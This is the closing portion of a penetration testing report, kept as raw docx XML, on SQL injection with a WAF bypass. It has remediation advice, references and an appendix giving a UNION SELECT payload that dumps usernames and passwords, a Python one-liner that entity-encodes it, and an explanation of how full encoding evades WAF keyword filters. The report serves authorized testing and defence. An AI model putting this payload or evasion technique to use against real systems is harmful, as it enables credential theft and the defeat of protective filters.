      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="60" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">6.3  Defence-in-Depth (after root cause is fixed)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy a WAF with input normalization (decode before inspect) as a secondary layer — not a primary control.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Enable database query logging and alert on anomalous UNION / multi-statement patterns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Conduct quarterly web application penetration tests against production and staging environments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement a Content Security Policy and enforce HTTPS to reduce the attack surface for secondary exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="80" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Appendix A — Payload Reference</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Python one-liner used to generate the fully-encoded payload:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF41"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">s = "1 UNION SELECT username||'~'||password FROM users"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF41"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">encoded = ''.join('&amp;#x{:02x};'.format(ord(c)) for c in s)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF41"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">print(encoded)</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Why full encoding is necessary:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Partial encoding (e.g., encoding only UNION/SELECT but leaving username/password/users as plaintext) is insufficient. The WAF matched on table and column names independently and returned "Attack Detected". Every character of the payload — including column names, string literals, spaces, and operators — must be entity-encoded to avoid triggering keyword filters.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="80" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Appendix B — References</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PortSwigger Web Security Academy — SQL Injection: https://portswigger.net/web-security/sql-injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PortSwigger — SQL Injection Cheat Sheet: https://portswigger.net/web-security/sql-injection/cheat-sheet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP — A03:2021 Injection: https://owasp.org/Top10/A03_2021-Injection/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP — SQL Injection Prevention Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE CWE-89 — Improper Neutralisation of Special Elements used in an SQL Command: https://cwe.mitre.org/data/definitions/89.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS v3.1 Calculator — NIST NVD: https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Report prepared by Ameya Panchal | ameyapanchal.career@gmail.com | 2026-08-03</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Authorized testing only. Portfolio sample — do not distribute.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VAPT Report — SQL Injection with WAF Bypass</dc:title>
  <dc:creator>Ameya Panchal</dc:creator>
  <dc:description>Professional web application penetration testing report</dc:description>
  <cp:lastModifiedBy>Un-named</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-08-03T07:10:09.761Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-08-03T07:10:09.761Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>